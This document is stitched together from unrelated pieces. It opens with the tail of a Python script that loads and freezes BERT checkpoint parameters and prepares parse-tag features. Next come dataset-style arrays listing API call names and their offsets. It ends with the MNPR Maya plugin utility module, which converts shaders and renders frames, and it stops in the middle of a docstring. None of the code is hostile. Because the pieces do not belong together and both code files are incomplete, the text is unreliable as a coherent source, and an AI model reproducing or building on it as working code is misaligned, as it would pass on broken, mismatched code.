logger.info('loading filler selectors from checkpoint model')
desired_keys.extend(['head.WaF.weight', 'head.WaF.bias'])
desired_keys.extend([name for name in model_state_dict.keys() if name.startswith('head.enc_aF')])
if args.load_bert_params:
logger.info('loading bert params from checkpoint model')
desired_keys.extend([name for name in model_state_dict.keys() if name.startswith('bert')])
if args.load_classifier:
logger.info('loading classifier params from checkpoint model')
desired_keys.extend([name for name in model_state_dict.keys() if name.startswith('classifier')])
if args.load_LSTM_params:
logger.info('loading LSTM params from checkpoint model')
desired_keys.extend([name for name in model_state_dict.keys() if name.startswith('head.rnn')])
state = dict()
for key, val in model_state_dict.items():
if key in desired_keys:
state[key] = val
model.load_state_dict(state, strict=False)
frozen_keys = []
if args.freeze_role:
logger.info('freezing roles if loaded from ckpt model')
frozen_keys.extend(['head.R.weight', 'head.R.bias'])
if args.freeze_filler:
logger.info('freezing fillers if loaded from ckpt model')
frozen_keys.extend(['head.F.weight', 'head.F.bias'])
if args.freeze_role_selector:
logger.info('freezing role selectors if loaded from ckpt model')
frozen_keys.extend(['head.WaR.weight', 'head.WaR.bias'])
frozen_keys.extend([name for name in model_state_dict.keys() if name.startswith('head.enc_aR')])
if args.freeze_filler_selector:
logger.info('freezing filler selectors if loaded from ckpt model')
frozen_keys.extend(['head.WaF.weight', 'head.WaF.bias'])
frozen_keys.extend([name for name in model_state_dict.keys() if name.startswith('head.enc_aF')])
if args.freeze_bert_params:
logger.info('freezing bert params if loaded from ckpt model')
frozen_keys.extend([name for name in model_state_dict.keys() if name.startswith('bert')])
if args.freeze_classifier:
logger.info('freezing classifier params if loaded from ckpt model')
frozen_keys.extend([name for name in model_state_dict.keys() if name.startswith('classifier')])
if args.freeze_LSTM_params:
logger.info('freezing LSTM params if loaded from ckpt model')
frozen_keys.extend([name for name in model_state_dict.keys() if name.startswith('head.rnn')])
for name, param in model.named_parameters():
if name in frozen_keys:
param.requires_grad = False
if args.fp16:
model.half()
model.to(device)
if args.local_rank != -1:
try:
from apex.parallel import DistributedDataParallel as DDP
except ImportError:
raise ImportError(
"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
model = DDP(model)
elif n_gpu > 1:
model = torch.nn.DataParallel(model)
return model, bert_config
def prepare_structure_values(args, eval_task_name, all_ids, F_list, R_list, F_full, R_full, all_tokens, token_pos, token_ner, token_dep, token_const):
values = {}
if args.single_sentence or eval_task_name.lower() in ['sst', 'cola']:
index = 0
tokens = [val[index] for val in all_tokens]
pos_tags = [[subval[1] for subval in val[index]] for val in token_pos]
ner_tags = [[subval[1] for subval in val[index]] for val in token_ner]
dep_parse_tokens = [[subval[0] for subval in val[index]] for val in token_dep]
dep_parse = [[subval[1] for subval in val[index]] for val in token_dep]
const_parse = [[subval[1] for subval in val[index]] for val in token_const]
parse_tree_depth = [[len(subval[1]) for subval in val[index]] for val in token_const]
else:
tokens = []
pos_tags = []
ner_tags = []
dep_parse_tokens = []
dep_parse = []
const_parse = []
parse_tree_depth = []
index = 0
tokens_a = [val[index] for val in all_tokens]
pos_tags_a = [[subval[1] for subval in val[index]] for val in token_pos]
ner_tags_a = [[subval[1] for subval in val[index]] for val in token_ner]
dep_parse_tokens_a = [[subval[0] for subval in val[index]] for val in token_dep]
dep_parses_a = [[subval[1] for subval in val[index]] for val in token_dep]
const_parses_a = [[subval[1] for subval in val[index]] for val in token_const]
parse_tree_depths_a = [[len(subval[1]) for subval in val[index]] for val in token_const]
index = 1
tokens_b = [val[index] for val in all_tokens]
pos_tags_b = [[subval[1] for subval in val[index]] for val in token_pos]
ner_tags_b = [[subval[1] for subval in val[index]] for val in token_ner]
dep_parse_tokens_b = [[subval[0] for subval in val[index]] for val in token_dep]
dep_parses_b = [[subval[1] for subval in val[index]] for val in token_dep]
const_parses_b = [[subval[1] for subval in val[index]] for val in token_const]
parse_tree_depths_b = [[len(subval[1]) for subval in val[index]] for val in token_const]
for token_a, token_b in zip(tokens_a, tokens_b):
tokens.append(token_a + ['[SEP]'] + token_b)
for pos_tag_a, pos_tag_b in zip(pos_tags_a, pos_tags_b):
pos_tags.append(pos_tag_a + ['SEP'] + pos_tag_b)
for ner_tag_a, ner_tag_b in zip(ner_tags_a, ner_tags_b):
ner_tags.append(ner_tag_a + ['[SEP]'] + ner_tag_b)
for dep_parse_token_a, dep_parse_token_b in zip(dep_parse_tokens_a, dep_parse_tokens_b):
dep_parse_tokens.append(dep_parse_token_a + ['[SEP]'] + dep_parse_token_b)
for dep_parse_a, dep_parse_b in zip(dep_parses_a, dep_parses_b):
dep_parse.append(dep_parse_a + ['[SEP]'] + dep_parse_b)
for const_parse_a, const_parse_b in zip(const_parses_a, const_parses_b):
const_parse.append(const_parse_a + ['[SEP]'] + const_parse_b)
for parse_tree_depth_a, parse_tree_depth_b in zip(parse_tree_depths_a, parse_tree_depths_b):
parse_tree_depth.append(parse_tree_depth_a + ['[SEP]'] + parse_tree_depth_b)
bad_sents_count = 0
for i in range(len(all_ids)):
try:
assert len(tokens[i]) == len(F_list[i]) == len(R_list[i]) == len(F_full[i]) == len(R_full[i])
val_i = {'tokens': tokens[i], 'all_aFs': F_list[i], 'all_aRs': R_list[i], 'all_aFs_full': F_full[i], 'all_aRs_full': R_full[i]}
if args.return_POS:
assert len(pos_tags[i]) == len(tokens[i])
val_i.update({'pos_tags': pos_tags[i]})
if args.return_NER:
assert len(ner_tags[i]) == len(tokens[i])
val_i.update({'ner_tags': ner_tags[i]})
if args.return_DEP:
assert len(dep_parse_tokens[i]) == len(dep_parse[i])
val_i.update({'dep_parse_tokens': dep_parse_tokens[i],'dep_edge': dep_parse[i]})
if args.return_CONST:
assert len(const_parse[i]) == len(tokens[i])
val_i.update({'const_parse_path': const_parse[i]})
assert len(parse_tree_depth[i]) == len(tokens[i])
val_i.update({'tree_depth': parse_tree_depth[i]})
values[all_ids[i]] = val_i
except:
bad_sents_count += 1
logger.info('Could not parse {:.2f}% of the sentences out of all {} data points'.format(bad_sents_count/ len(all_ids)*100, len(all_ids)))
return values | [
"torch.utils.data.distributed.DistributedSampler",
"modules.model.BertForSequenceClassification_tpr",
"torch.distributed.get_world_size",
"torch.optim.SGD",
"torch.utils.data.SequentialSampler",
"torch.utils.data.TensorDataset",
"utils.data_utils.logger.info",
"transformers.optimization.WarmupLinearSc... | [((883, 916), 'os.path.join', 'os.path.join', (['args.data_dir', 'task'], {}), '(args.data_dir, task)\n', (895, 916), False, 'import os\n'), ((1246, 1425), 'utils.data_utils.convert_examples_to_features', 'convert_examples_to_features', (['examples', 'label_list', 'args.max_seq_length', 'tokenizer', 'single_sentence', 'return_pos_tags', 'return_ner_tags', 'return_dep_parse', 'return_const_parse'], {}), '(examples, label_list, args.max_seq_length,\n tokenizer, single_sentence, return_pos_tags, return_ner_tags,\n return_dep_parse, return_const_parse)\n', (1274, 1425), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((1571, 1612), 'utils.data_utils.logger.info', 'logger.info', (['"""***** preparing data *****"""'], {}), "('***** preparing data *****')\n", (1582, 1612), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((1756, 1800), 'utils.data_utils.logger.info', 'logger.info', (['""" Batch size = %d"""', 'batch_size'], {}), "(' Batch size = %d', batch_size)\n", (1767, 1800), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((1821, 1884), 'torch.tensor', 'torch.tensor', (['[f.input_ids for f in features]'], {'dtype': 'torch.long'}), '([f.input_ids for f in features], dtype=torch.long)\n', (1833, 1884), False, 'import torch\n'), ((1906, 1971), 'torch.tensor', 'torch.tensor', (['[f.input_mask for f in features]'], {'dtype': 'torch.uint8'}), '([f.input_mask for f in features], dtype=torch.uint8)\n', (1918, 1971), False, 'import torch\n'), ((1994, 2059), 'torch.tensor', 'torch.tensor', (['[f.segment_ids for f in features]'], {'dtype': 'torch.long'}), '([f.segment_ids for f in features], dtype=torch.long)\n', (2006, 2059), False, 'import torch\n'), ((2085, 2154), 'torch.tensor', 'torch.tensor', (['[f.sub_word_masks for f in features]'], {'dtype': 'torch.uint8'}), '([f.sub_word_masks for f in features], dtype=torch.uint8)\n', (2097, 2154), False, 'import torch\n'), ((2184, 2255), 'torch.tensor', 'torch.tensor', (['[f.orig_to_token_map for f in features]'], {'dtype': 'torch.long'}), '([f.orig_to_token_map for f in features], dtype=torch.long)\n', (2196, 2255), False, 'import torch\n'), ((3367, 3423), 'torch.utils.data.DataLoader', 'DataLoader', (['data'], {'sampler': 'sampler', 'batch_size': 'batch_size'}), '(data, sampler=sampler, batch_size=batch_size)\n', (3377, 3423), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((5855, 6024), 'modules.model.BertForSequenceClassification_tpr', 'BertForSequenceClassification_tpr', (['bert_config'], {'num_labels': 'num_labels', 'task_type': 'task_type', 'temperature': 'args.temperature', 'max_seq_len': 'args.max_seq_length'}), '(bert_config, num_labels=num_labels,\n task_type=task_type, temperature=args.temperature, max_seq_len=args.\n max_seq_length, **opt)\n', (5888, 6024), False, 'from modules.model import BertForSequenceClassification_tpr\n'), ((2937, 3061), 'torch.utils.data.TensorDataset', 'TensorDataset', (['all_input_ids', 'all_input_mask', 'all_segment_ids', 'all_sub_word_masks', 'all_orig_to_token_maps', 'all_label_ids'], {}), '(all_input_ids, all_input_mask, all_segment_ids,\n all_sub_word_masks, all_orig_to_token_maps, all_label_ids)\n', (2950, 3061), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((3282, 3305), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['data'], {}), '(data)\n', (3299, 3305), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((4344, 4452), 'apex.optimizers.FusedAdam', 'FusedAdam', (['optimizer_grouped_parameters'], {'lr': 'args.learning_rate', 'bias_correction': '(False)', 'max_grad_norm': '(1.0)'}), '(optimizer_grouped_parameters, lr=args.learning_rate,\n bias_correction=False, max_grad_norm=1.0)\n', (4353, 4452), False, 'from apex.optimizers import FusedAdam\n'), ((6591, 6617), 'os.path.join', 'os.path.join', (['loading_path'], {}), '(loading_path)\n', (6603, 6617), False, 'import os\n'), ((6635, 6685), 'torch.load', 'torch.load', (['output_model_file'], {'map_location': 'device'}), '(output_model_file, map_location=device)\n', (6645, 6685), False, 'import torch\n'), ((10679, 10689), 'apex.parallel.DistributedDataParallel', 'DDP', (['model'], {}), '(model)\n', (10682, 10689), True, 'from apex.parallel import DistributedDataParallel as DDP\n'), ((2344, 2406), 'torch.tensor', 'torch.tensor', (['[f.label_id for f in features]'], {'dtype': 'torch.long'}), '([f.label_id for f in features], dtype=torch.long)\n', (2356, 2406), False, 'import torch\n'), ((2426, 2550), 'torch.utils.data.TensorDataset', 'TensorDataset', (['all_input_ids', 'all_input_mask', 'all_segment_ids', 'all_sub_word_masks', 'all_orig_to_token_maps', 'all_label_ids'], {}), '(all_input_ids, all_input_mask, all_segment_ids,\n all_sub_word_masks, all_orig_to_token_maps, all_label_ids)\n', (2439, 2550), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((2580, 2689), 'torch.utils.data.TensorDataset', 'TensorDataset', (['all_input_ids', 'all_input_mask', 'all_segment_ids', 'all_sub_word_masks', 'all_orig_to_token_maps'], {}), '(all_input_ids, all_input_mask, all_segment_ids,\n all_sub_word_masks, all_orig_to_token_maps)\n', (2593, 2689), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((2751, 2813), 'torch.tensor', 'torch.tensor', (['[f.label_id for f in features]'], {'dtype': 'torch.long'}), '([f.label_id for f in features], dtype=torch.long)\n', (2763, 2813), False, 'import torch\n'), ((2856, 2921), 'torch.tensor', 'torch.tensor', (['[f.label_id for f in features]'], {'dtype': 'torch.float32'}), '([f.label_id for f in features], dtype=torch.float32)\n', (2868, 2921), False, 'import torch\n'), ((3173, 3192), 'torch.utils.data.RandomSampler', 'RandomSampler', (['data'], {}), '(data)\n', (3186, 3192), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((3229, 3253), 'torch.utils.data.distributed.DistributedSampler', 'DistributedSampler', (['data'], {}), '(data)\n', (3247, 3253), False, 'from torch.utils.data.distributed import DistributedSampler\n'), ((3976, 4010), 'torch.distributed.get_world_size', 'torch.distributed.get_world_size', ([], {}), '()\n', (4008, 4010), False, 'import torch\n'), ((4596, 4646), 'apex.optimizers.FP16_Optimizer', 'FP16_Optimizer', (['optimizer'], {'dynamic_loss_scale': '(True)'}), '(optimizer, dynamic_loss_scale=True)\n', (4610, 4646), False, 'from apex.optimizers import FP16_Optimizer\n'), ((4685, 4745), 'apex.optimizers.FP16_Optimizer', 'FP16_Optimizer', (['optimizer'], {'static_loss_scale': 'args.loss_scale'}), '(optimizer, static_loss_scale=args.loss_scale)\n', (4699, 4745), False, 'from apex.optimizers import FP16_Optimizer\n'), ((4818, 4896), 'transformers.optimization.AdamW', 'AdamW', (['optimizer_grouped_parameters'], {'lr': 'args.learning_rate', 'correct_bias': '(False)'}), '(optimizer_grouped_parameters, lr=args.learning_rate, correct_bias=False)\n', (4823, 4896), False, 'from transformers.optimization import AdamW, WarmupLinearSchedule\n'), ((4987, 5086), 'transformers.optimization.WarmupLinearSchedule', 'WarmupLinearSchedule', (['optimizer'], {'warmup_steps': '(args.warmup_proportion * t_total)', 't_total': 't_total'}), '(optimizer, warmup_steps=args.warmup_proportion *\n t_total, t_total=t_total)\n', (5007, 5086), False, 'from transformers.optimization import AdamW, WarmupLinearSchedule\n'), ((6898, 6948), 'utils.data_utils.logger.info', 'logger.info', (['"""loading roles from checkpoint model"""'], {}), "('loading roles from checkpoint model')\n", (6909, 6948), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((7056, 7108), 'utils.data_utils.logger.info', 'logger.info', (['"""loading fillers from checkpoint model"""'], {}), "('loading fillers from checkpoint model')\n", (7067, 7108), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((7223, 7282), 'utils.data_utils.logger.info', 'logger.info', (['"""loading role selectors from checkpoint model"""'], {}), "('loading role selectors from checkpoint model')\n", (7234, 7282), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((7513, 7574), 'utils.data_utils.logger.info', 'logger.info', (['"""loading filler selectors from checkpoint model"""'], {}), "('loading filler selectors from checkpoint model')\n", (7524, 7574), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((7801, 7857), 'utils.data_utils.logger.info', 'logger.info', (['"""loading bert params from checkpoint model"""'], {}), "('loading bert params from checkpoint model')\n", (7812, 7857), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((8006, 8068), 'utils.data_utils.logger.info', 'logger.info', (['"""loading classifier params from checkpoint model"""'], {}), "('loading classifier params from checkpoint model')\n", (8017, 8068), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((8224, 8280), 'utils.data_utils.logger.info', 'logger.info', (['"""loading LSTM params from checkpoint model"""'], {}), "('loading LSTM params from checkpoint model')\n", (8235, 8280), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((8651, 8706), 'utils.data_utils.logger.info', 'logger.info', (['"""freezing roles if loaded from ckpt model"""'], {}), "('freezing roles if loaded from ckpt model')\n", (8662, 8706), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((8815, 8872), 'utils.data_utils.logger.info', 'logger.info', (['"""freezing fillers if loaded from ckpt model"""'], {}), "('freezing fillers if loaded from ckpt model')\n", (8826, 8872), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((8988, 9052), 'utils.data_utils.logger.info', 'logger.info', (['"""freezing role selectors if loaded from ckpt model"""'], {}), "('freezing role selectors if loaded from ckpt model')\n", (8999, 9052), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((9283, 9349), 'utils.data_utils.logger.info', 'logger.info', (['"""freezing filler selectors if loaded from ckpt model"""'], {}), "('freezing filler selectors if loaded from ckpt model')\n", (9294, 9349), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((9576, 9637), 'utils.data_utils.logger.info', 'logger.info', (['"""freezing bert params if loaded from ckpt model"""'], {}), "('freezing bert params if loaded from ckpt model')\n", (9587, 9637), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((9787, 9854), 'utils.data_utils.logger.info', 'logger.info', (['"""freezing classifier params if loaded from ckpt model"""'], {}), "('freezing classifier params if loaded from ckpt model')\n", (9798, 9854), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((10011, 10072), 'utils.data_utils.logger.info', 'logger.info', (['"""freezing LSTM params if loaded from ckpt model"""'], {}), "('freezing LSTM params if loaded from ckpt model')\n", (10022, 10072), False, 'from utils.data_utils import convert_examples_to_features, logger\n'), ((10726, 10754), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model'], {}), '(model)\n', (10747, 10754), False, 'import torch\n'), ((5309, 5365), 'torch.optim.SGD', 'SGD', (['optimizer_grouped_parameters'], {'lr': 'args.learning_rate'}), '(optimizer_grouped_parameters, lr=args.learning_rate)\n', (5312, 5365), False, 'from torch.optim import SGD\n')] |
"""
@license: MIT
@repository: https://github.com/semontesdeoca/MNPR
_
_ __ ___ _ __ _ __ _ __ ___ _ _ ___| |_ ___ _ __ ___
| '_ ` _ \| '_ \| '_ \| '__| / __| | | / __| __/ _ \ '_ ` _ \
| | | | | | | | | |_) | | \__ \ |_| \__ \ || __/ | | | | |
|_| |_| |_|_| |_| .__/|_| |___/\__, |___/\__\___|_| |_| |_|
|_| |___/
@summary: MNPR related functions
"""
from __future__ import print_function
import os
import traceback
import maya.cmds as cmds
import maya.mel as mel
import coopLib as lib
import mnpr_info
import mnpr_runner
import mnpr_matPresets
mnpr_info.loadPlugin()
dx2sfxAttr = {"xUseColorTexture": "Albedo_Texture",
"xColorTint": "Color_Tint",
"xUseNormalTexture": "Normal_Map",
"xFlipU": "Invert_U",
"xFlipV": "Invert_V",
"xBumpDepth": "Bump_Depth",
"xUseSpecularTexture": "Specular_Map",
"xSpecular": "Specular_Roll_Off",
"xSpecDiffusion": "Specular_Diffusion",
"xSpecTransparency": "Specular_Transparency",
"xUseShadows": "",
"xShadowDepthBias": "",
"xDiffuseFactor": "Diffuse_Factor",
"xShadeColor": "Shade_Color",
"xShadeWrap": "Shade_Wrap",
"xUseOverrideShade": "Shade_Override",
"xDilute": "Dilute_Paint",
"xCangiante": "Cangiante",
"xDiluteArea": "Dilute_Area",
"xHighArea": "Highlight_Roll_Off",
"xHighTransparency": "Highlight_Transparency",
"xAtmosphereColor": "",
"xRangeStart": "",
"xRangeEnd": "",
"xDarkEdges": "",
"xMainTex": "Albedo_Texture_File",
"xNormalTex": "Normal_Map_File",
"xSpecTex": "Specular_Map_File"
}
def check():
"""Makes sure everything is running right"""
print("SYSTEM CHECK FOR {0}".format(mnpr_info.prototype))
# check viewport
viewport = lib.getActiveModelPanel()
cmds.modelEditor(viewport, dtx=True, e=True) # display textures
# plugin needs to be loaded
mnpr_info.loadRenderer()
# 3rd party plugins must be loaded
cmds.loadPlugin('shaderFXPlugin', quiet=True)
if cmds.about(nt=True, q=True):
cmds.loadPlugin('dx11Shader', quiet=True) # deprecated (only shadeFXPlugin in the future)
cmds.loadPlugin('glslShader', quiet=True) # deprecated (only shaderFXPlugin in the future)
# viewport renderer must be set
mel.eval("setRendererAndOverrideInModelPanel vp2Renderer {0} {1};".format(mnpr_info.prototype, viewport))
# modify color of heads up display
cmds.displayColor("headsUpDisplayLabels", 2, dormant=True)
cmds.displayColor("headsUpDisplayValues", 2, dormant=True)
# make sure a config node exists
if not cmds.objExists(mnpr_info.configNode):
selected = cmds.ls(sl=True, l=True)
selectConfig()
cmds.select(selected, r=True)
lib.printInfo("-> SYSTEM CHECK SUCCESSFUL")
def changeStyle():
"""Resets MNPR to load a new style"""
# reset stylization
cmds.mnpr(resetStylization=True)
# delete old config node
if cmds.objExists(mnpr_info.configNode):
cmds.delete(mnpr_info.configNode)
# flush undo
cmds.flushUndo()
print("style deleted")
# deregister node
cmds.mnpr(rn=False)
# register node
cmds.mnpr(rn=True)
# create new config node
selectConfig()
# refresh AETemplate
mnpr_runner.reloadConfig()
# set new media type
mnpr_info.media = cmds.mnpr(style=True, q=True)
# rebuild opened UI's
import mnpr_UIs
if cmds.window(mnpr_UIs.BreakdownUI.windowTitle, exists=True):
mnpr_runner.openOverrideSettings(rebuild=True)
import mnpr_FX
if cmds.window(mnpr_FX.MNPR_FX_UI.windowTitle, exists=True):
mnpr_runner.openPaintFX(rebuild=True)
lib.printInfo("Style changed")
def togglePlugin(force=""):
"""
Toggles active or forces desired plugin prototype
Args:
force (str): plugin name to force
"""
if force:
unloadPlugin(mnpr_info.prototype)
mnpr_info.prototype = force
check()
else:
# toggle loaded prototype
if cmds.pluginInfo(mnpr_info.prototype, loaded=True, q=True):
unloadPlugin(mnpr_info.prototype)
else:
check()
def unloadPlugin(plugin):
"""
Unloads plugin and cleans scene from plugin traces
Args:
plugin (str): name of plugin to be unloaded
"""
# check which prototype is active
if cmds.pluginInfo(plugin, loaded=True, q=True):
# remove traces and unload
if cmds.objExists(mnpr_info.configNode):
cmds.delete(mnpr_info.configNode) # delete config node
cmds.flushUndo() # clear undo queue
cmds.unloadPlugin(plugin) # unload plugin
lib.printInfo("->PLUGIN SUCCESSFULLY UNLOADED")
def showShaderAttr():
""" Select material and show in attribute editor """
if cmds.ls(sl=True):
cmds.hyperShade(smn=True)
mel.eval("openAEWindow")
else:
cmds.warning("Select object with shader")
def refreshShaders():
""" Refreshes object-space plugin shaders """
shaderDir = systemDir("shaders")
if os.name == 'nt' and mnpr_info.backend == 'dx11':
shaderFile = os.path.join(shaderDir, "PrototypeC.fx")
if not os.path.isfile(shaderFile):
shaderFile = os.path.join(shaderDir, "prototypeC.fxo")
shaders = cmds.ls(type="dx11Shader")
else:
shaderFile = os.path.join(shaderDir, "PrototypeC.ogsfx")
shaders = cmds.ls(type="GLSLShader")
for shader in shaders:
cmds.setAttr("{0}.shader".format(shader), shaderFile, type="string")
lib.printInfo('Shaders refreshed')
return True
def updateShaderFX():
""" Updates shaderFX shaders"""
shaderDir = systemDir("shaders")
materials = cmds.ls(type="ShaderfxShader")
counter = 0
for mat in materials:
counter += 1
# get materials attributes
matAttrs = {}
mnpr_matPresets.getMaterialAttrs(mat, matAttrs)
# load new graph
shaderFile = os.path.join(shaderDir, "{0}.sfx".format(matAttrs["graph"]))
cmds.shaderfx(sfxnode=mat, loadGraph=shaderFile)
# set attributes
mnpr_matPresets.setMaterialAttrs(mat, matAttrs)
print("{0} has been updated to the latest version".format(mat))
print("{0}/{1} materials updated".format(counter, len(materials)))
lib.printInfo('Shaders updated')
def dx112glsl():
""" Converts dx11 materials to glsl materials """
check()
dx11Shaders = cmds.ls(type="dx11Shader")
print(dx11Shaders)
for dx11Shader in dx11Shaders:
print("Transfering {0} shader".format(dx11Shader))
# get all attributes
attributes = cmds.listAttr(dx11Shader, ud=True, st="x*", k=True)
print(attributes)
# get all connected nodes
connectedNodes = cmds.listConnections(dx11Shader, t="file", c=True, p=True)
print(connectedNodes)
# get all shapes
cmds.select(dx11Shader, r=True)
cmds.hyperShade(objects="")
shapes = cmds.ls(sl=True)
print(shapes)
# create glsl shader
shader = cmds.shadingNode('GLSLShader', asShader=True, n="{0}_GL".format(dx11Shader))
cmds.select(shapes, r=True)
cmds.hyperShade(assign=shader)
print(">>> Shader {0} created".format(shader))
# assign attributes
shaderFile = os.path.join(mnpr_info.environment,"shaders","PrototypeC.ogsfx")
cmds.setAttr("{0}.shader".format(shader), shaderFile, type="string")
print("Setting attributes for {0}".format(shader))
for attr in attributes:
value = cmds.getAttr("{0}.{1}".format(dx11Shader, attr))
try:
if type(value) == type([]):
cmds.setAttr("{0}.{1}".format(shader, attr), value[0][0], value[0][1], value[0][2], typ="double3")
else:
cmds.setAttr("{0}.{1}".format(shader, attr), value)
except:
print("Found problemt when setting {0}.{1}, skipping for now".format(shader, attr))
# connect nodes
if connectedNodes:
for i in range(0, len(connectedNodes), 2):
inputAttr = connectedNodes[i].split(".")[1]
cmds.connectAttr(connectedNodes[i+1], "{0}.{1}".format(shader, inputAttr))
# set control sets
if cmds.attributeQuery("Color0_Source", node=shader, ex=True):
cmds.setAttr("{0}.Color0_Source".format(shader), "color:controlSetA", type="string" )
if cmds.attributeQuery("Color1_Source", node=shader, ex=True):
cmds.setAttr("{0}.Color1_Source".format(shader), "color:controlSetB", type="string" )
if cmds.attributeQuery("Color2_Source", node=shader, ex=True):
cmds.setAttr("{0}.Color2_Source".format(shader), "color:controlSetC", type="string" )
# delete dx11 shader
#cmds.delete(dx11Shader)
def dx112sfx(graph="mnpr_uber"):
"""
Converts dx11 materials to shaderFX materials
Args:
graph (str): ShaderFX graph name (filename)
"""
check()
dx11Shaders = cmds.ls(type="dx11Shader")
prototypeCNodes = []
for dx11Shader in dx11Shaders:
shaderPath = cmds.getAttr("{0}.shader".format(dx11Shader))
if "rototypeC" not in shaderPath:
continue
prototypeCNodes.append(dx11Shader)
print("Converting {0} shader".format(dx11Shader))
# get all attributes
attributes = cmds.listAttr(dx11Shader, ud=True, st="x*", k=True)
print(attributes)
# get all connected nodes
connectedNodes = cmds.listConnections(dx11Shader, t="file", c=True)
print(connectedNodes)
# get all shapes
cmds.select(dx11Shader, r=True)
cmds.hyperShade(objects="")
shapes = cmds.ls(sl=True)
print(shapes)
# create shaderFX shader
shader = cmds.shadingNode('ShaderfxShader', asShader=True, name="{0}".format(dx11Shader.replace("_WC", "_SFX")))
cmds.select(shapes, r=True)
cmds.hyperShade(assign=shader)
shaderFile = os.path.join(mnpr_info.environment, "shaders", "{0}.sfx".format(graph))
cmds.shaderfx(sfxnode=shader, loadGraph=shaderFile)
print(">>> Shader {0} created".format(shader))
# assign settings
vtxControl = bool(cmds.getAttr("{0}.{1}".format(dx11Shader, "xUseControl")))
if vtxControl:
nodeId = cmds.shaderfx(sfxnode=shader, getNodeIDByName="vtxControls")
cmds.shaderfx(sfxnode=shader, edit_bool=(nodeId, "value", vtxControl))
shadows = bool(cmds.getAttr("{0}.{1}".format(dx11Shader, "xUseShadows")))
if not shadows:
nodeId = cmds.shaderfx(sfxnode=shader, getNodeIDByName="Shadow")
cmds.shaderfx(sfxnode=shader, edit_bool=(nodeId, "value", shadows))
specularity = bool(cmds.getAttr("{0}.{1}".format(dx11Shader, "xSpecular")))
if specularity:
nodeId = cmds.shaderfx(sfxnode=shader, getNodeIDByName="Specularity")
cmds.shaderfx(sfxnode=shader, edit_bool=(nodeId, "value", specularity))
# assign attributes
print("Setting attributes for {0}".format(shader))
for attr in attributes:
value = cmds.getAttr("{0}.{1}".format(dx11Shader, attr))
if attr in dx2sfxAttr:
lib.setAttr(shader, dx2sfxAttr[attr], value)
# assign textures
if connectedNodes:
for i in range(0, len(connectedNodes), 2):
textureDir = cmds.getAttr("{0}.{1}".format(connectedNodes[i+1], "fileTextureName"))
attr = connectedNodes[i].split(".")[1]
lib.setAttr(shader, dx2sfxAttr[attr], textureDir)
# delete prototypeC shaders
cmds.delete(prototypeCNodes)
def systemDir(folder=''):
"""
Returns the system directory
Args:
folder (str): folder to append to system directory
Returns:
(str): path to system directory
"""
rootDir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
return os.path.join(rootDir, folder)
def selectConfig():
"""Select configuration node and re-check connections"""
# delete old configuration nodes
if cmds.objExists("NPRConfig"):
cmds.delete("NPRConfig")
if not cmds.objExists(mnpr_info.configNode):
print(mnpr_info.configNode)
cmds.createNode("mnprConfig", n=mnpr_info.configNode)
cmds.connectAttr("{0}.evaluate".format(mnpr_info.configNode), "persp.visibility", f=True)
mel.eval("AttributeEditor")
lib.printInfo("-> CONFIG NODE CREATED AND CONNECTED")
else:
cmds.select(mnpr_info.configNode)
mel.eval("AttributeEditor")
lib.printInfo("Selected {0} configuration node".format(mnpr_info.prototype))
def optimizePerformance():
"""Function to optimize performance by disabling some Maya functions"""
cmds.evaluationManager(mode="off") # set up animation evaluation to DG
def renderFrame(saveDir, width, height, renderSize=1, imgFormat=".jpg", override=mnpr_info.prototype):
"""
Renders current frame in the viewport
Args:
saveDir (str): save directory
width (int): width in pixels
height (int): height in pixels
renderSize (float): render size (factor)
imgFormat (str): .jpg, .exr, etc)
override (str): name of desired override (if any)
"""
check() # check that everything is in order
renderSize = resolutionCheck(width, height, renderSize) # make sure resolution is reasonable
# get working values to be changed
workingRenderSize = cmds.getAttr("{0}.renderScale".format(mnpr_info.configNode))
workingColorDepth = cmds.getAttr("{0}.colorDepth".format(mnpr_info.configNode))
# set desired attributes
if workingColorDepth != 2:
lib.setAttr(mnpr_info.configNode, "colorDepth", 2)
if renderSize != workingRenderSize:
lib.setAttr(mnpr_info.configNode, "renderScale", renderSize)
# prepare renderer
cmds.mnpr(g=True) # enable mnprGamma
mnprOperations = len(cmds.mnpr(lsO=True))
cmds.mnpr(renderOperation=mnprOperations-1, s=0) # HUD
cmds.mnpr(renderOperation=mnprOperations-2, s=0) # UI
cmds.refresh()
# render frame
try:
screenshotPath = lib.screenshot(saveDir, width, height, format=imgFormat, override=override) # render the frame
except WindowsError:
print("Screenshot saving has been canceled")
except:
traceback.print_exc()
if screenshotPath:
# bring everything back to normal
cmds.mnpr(renderOperation=mnprOperations-1, s=1) # HUD
cmds.mnpr(renderOperation=mnprOperations-2, s=1) # UI
lib.setAttr(mnpr_info.configNode, "renderScale", workingRenderSize)
lib.setAttr(mnpr_info.configNode, "colorDepth", workingColorDepth)
cmds.mnpr(g=False)
cmds.refresh()
return screenshotPath
def playblast(saveDir, width, height, renderCamera, modelPanel, renderSize=1):
"""
Playblasts the timeslider
